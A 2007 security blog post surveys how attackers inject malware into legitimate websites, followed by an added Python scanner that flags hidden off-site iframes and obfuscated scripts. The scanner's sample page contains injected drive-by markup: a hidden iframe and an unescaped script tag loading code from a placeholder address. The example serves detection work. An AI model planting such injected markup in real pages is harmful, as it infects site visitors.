Malware embedded web sites are steadily gaining priority in an attacker's arsenal of infection and propagation vectors, and we've been witnessing the trend for over a year and a half now. Malware authors seem to have found an efficient way to hijack, inject and exploit legitimate sites or Web 2.0 services in order to serve an obfuscated payload that no longer relies purely on social engineering tactics, but instead exploits unpatched client side vulnerabilities to infect the visitors. Also, malware authors seem to have started thinking as true marketers: taking into consideration that a visitor will go through a potentially malware embedded site only once and wouldn't return given the lack of content (blackhat SEO garbage), they've stopped relying on having a malicious site exploit a single vulnerability only, and started hosting multi-browser, multi-third-party malware embedded sites, thus achieving malicious economies of scale.

Here's a great summary courtesy of Sophos showcasing the increasing number of sites with malware embedded payload:
Wednesday, July 25, 2007
"The figures compiled by Sophos's global network of monitoring stations show that infected web pages continue to pose a threat, affecting official government websites as well as other legitimate pages. On average this month, Sophos uncovered 9,500 new infected web pages daily - an increase of more than 1000 every day when compared to April. In total, 304,000 web pages hosting malicious code were identified in May."
The stats are a great wake-up call for those still believing that malware comes in the form of executables and mostly uses email as its propagation and infection vector. Moreover, these stats show great similarities with the ones released by ScanSafe a year ago, whose conclusion, based on 5 billion web requests, was that one piece of malware was hosted on 1 of every 600 social networking pages. Furthermore, Finjan's latest Web Security Trends Report indicates the rise of evasive web malware aiming to make cyber forensics of malware embedded sites, like the ones I provided you with in previous posts, harder to conduct.
Malware embedding techniques
- vulnerabilities within popular traffic aggregators and Web 2.0 darlings have a huge potential, but a major downside from an attacker's perspective: they're like sending several hundred pieces of zero day malware to a couple of million email addresses, thus having antivirus vendors and the security community detect the malware outbreak and react accordingly
- a pull approach consisting of blackhat SEO on popular searches, or any strategy related to seducing the end user's desire for a "free lunch" online while abusing it. We've already seen automated spamming attacks against .EDU domains in order to harness the pagerank of university sites, so that the malicious sites rank higher in search engines
- a push approach, via spam and phishing emails: a form of digital greed where, in case the attackers cannot trick you into giving them your accounting and financial data, they infect you with malware along the way, a trend I'm seeing recently. Basically, you have a fake PayPal phishing page that also hosts malware in the middle of the scam
- passive, using advertising networks as infection vectors: basically, a fake but reputable looking service or product centered site is set up and an advertising budget on a CPC basis is allocated, so that even though you may be visiting Yahoo.com, an ad appearing at the top through a third-party advertising network may indeed turn out to be one loading a malicious payload. We've already seen this malicious cycle with zero day vulnerabilities, trying to take the maximum advantage out of the window of opportunity of a certain vulnerability, and although zero day vulnerabilities are greatly desired by malware authors, the plain and simple truth, whose effectiveness we've seen with MPack, is that an attack abusing old, already patched vulnerabilities can be a very successful one. So, if the end user doesn't patch, an old and already patched vulnerability has the same value as a zero day one, doesn't it?
- Web application vulnerabilities exploited in an automated fashion make it possible for malicious attackers to inject malicious pages within domains with high page rank and ones attracting lots of traffic. In a previous post I provided various screenshots of an IRC controlled bot Google hacking for vulnerabilities and injecting web shells to take control over the vulnerable sites. Next time it could logically be web backdoors, making it harder for the exploited party to react given the perimeter defense myopia they're still living in
- DIY malware kits make it possible for virtually anyone to embed malware on a web page. In my "Future Trends of Malware" publication I emphasized how open source malware is undermining the entire signature based detection model, at least in respect of timing. Open source malware evolved into open source exploitation and statistics tools, thus lowering the entry barriers into the malware area for anyone who has obtained the source code of these kits. It's even more interesting to note that, given the open source nature of the kits, modifications are already getting traded and used in the wild, so basically, the MPack kit we know of last month is someone else's advanced malware distribution platform next month. Anyway, going through an interview with the authors of MPack, I'd rather say that a little less on who, and a little more on what's to come in this space, would be a wise approach
- Malicious page hosting services, usually on compromised servers, purposely ignoring "take down notices" to further extend the window of opportunity for someone to visit and get infected. Various vendors such as RSA and NetCraft are already developing a market segment for timely shutting down such phishing and malware hosting web sites, and by the time the service scales enough I'd be very interested in seeing some averages based on the time it took them to shut down such a site
- A logical move exploiting the overall lack of awareness on the end user's part of how client side vulnerabilities result in malware infections, compared to the potentially malware infected downloads of the past; a very tricky situation by itself, taking into consideration the future growth of E-commerce. With end users becoming more privacy conscious, and with countless users who wouldn't purchase anything online for more than, let's say, $50, trying to communicate to them that malware can be found on literally any web site, and that it no longer comes in the typical binary form they're used to, could undermine their confidence in E-commerce even more
- Malicious economies of scale, a phrase I coined to bring the discussion to another level, namely that malware authors are putting in less effort but achieving a higher level of productivity, aptly describes the concept of malware embedded sites
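Since the techniques above all end with something injected into a page the victim trusts, a practitioner's first question is how to spot the injection. The following is an added example, not code from the original post or from any of the kits it mentions: a heuristic scan of an HTML document for two indicators that typically accompany such injections, a hidden or zero-sized iframe pointing off-site, and an inline script that decodes an escaped blob and hands it to eval() or document.write(). The sample page and the 203.0.113.7 address are constructed for the example; the indicators are assumptions about common injection patterns, not proof of compromise.

```python
"""Heuristic scan of an HTML page for injected, malware-serving content.

Added example, not taken from the original post.  Indicators (assumed,
commonly seen in drive-by injections): an off-site iframe that is hidden
or sized 0/1 px, and an inline script that decodes an escaped string
before passing it to eval()/document.write().  Treat hits as leads.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect <iframe> attribute dicts and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _is_hidden(attrs):
    """True if the iframe is styled invisible or sized to 0/1 pixels."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    width = re.sub(r"\D", "", attrs.get("width", ""))
    height = re.sub(r"\D", "", attrs.get("height", ""))
    return (width != "" and int(width) <= 1) or (height != "" and int(height) <= 1)


def find_hidden_iframes(html, page_host):
    """Return src values of hidden iframes whose host differs from page_host."""
    collector = _Collector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host  # relative src: same host
        if _is_hidden(attrs) and host != page_host:
            hits.append(src)
    return hits


# A decode step (unescape / String.fromCharCode) feeding a sink (eval /
# document.write), plus a run of at least eight %xx or \xNN escapes.
_DECODE_OR_SINK = re.compile(
    r"\b(unescape|eval|document\.write|String\.fromCharCode)\s*\(", re.I)
_ESCAPED_RUN = re.compile(r"(%[0-9a-f]{2}){8,}|(\\x[0-9a-f]{2}){8,}", re.I)


def find_obfuscated_scripts(html):
    """Return the first 60 chars of each inline script matching the pattern."""
    collector = _Collector()
    collector.feed(html)
    hits = []
    for body in collector.scripts:
        calls = {m.group(1).lower() for m in _DECODE_OR_SINK.finditer(body)}
        decodes = calls & {"unescape", "string.fromcharcode"}
        sinks = calls & {"eval", "document.write"}
        if decodes and sinks and _ESCAPED_RUN.search(body):
            hits.append(body.strip()[:60])
    return hits


def scan(html, page_host):
    """Run both checks and return the findings keyed by indicator."""
    return {
        "hidden_iframes": find_hidden_iframes(html, page_host),
        "obfuscated_scripts": find_obfuscated_scripts(html),
    }


# Constructed sample: a legitimate page with one injected iframe and one
# injected decode-and-write script.  203.0.113.7 is a documentation address.
SAMPLE_PAGE = """<html><head><title>Campus news</title></head><body>
<h1>Welcome</h1>
<iframe src="https://video.example.edu/player" width="640" height="360"></iframe>
<p>Legitimate content here.</p>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" style="visibility: hidden"></iframe>
<script>document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://203.0.113.7/x.js%22%3E%3C/%73%63%72%69%70%74%3E'));</script>
<script>var visits = 3; console.log("ok");</script>
</body></html>"""

if __name__ == "__main__":
    for indicator, hits in scan(SAMPLE_PAGE, "www.example.edu").items():
        print(indicator, hits)
```

The visible 640x360 iframe is left alone even though it is off-site, and a hidden iframe whose src stays on the page's own host is deliberately skipped to cut noise; when the site itself has been shelled, as in the automated web application exploitation case above, that second assumption no longer holds and the same-host check should be dropped.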
Posted by Dancho Danchev at Wednesday, July 25, 2007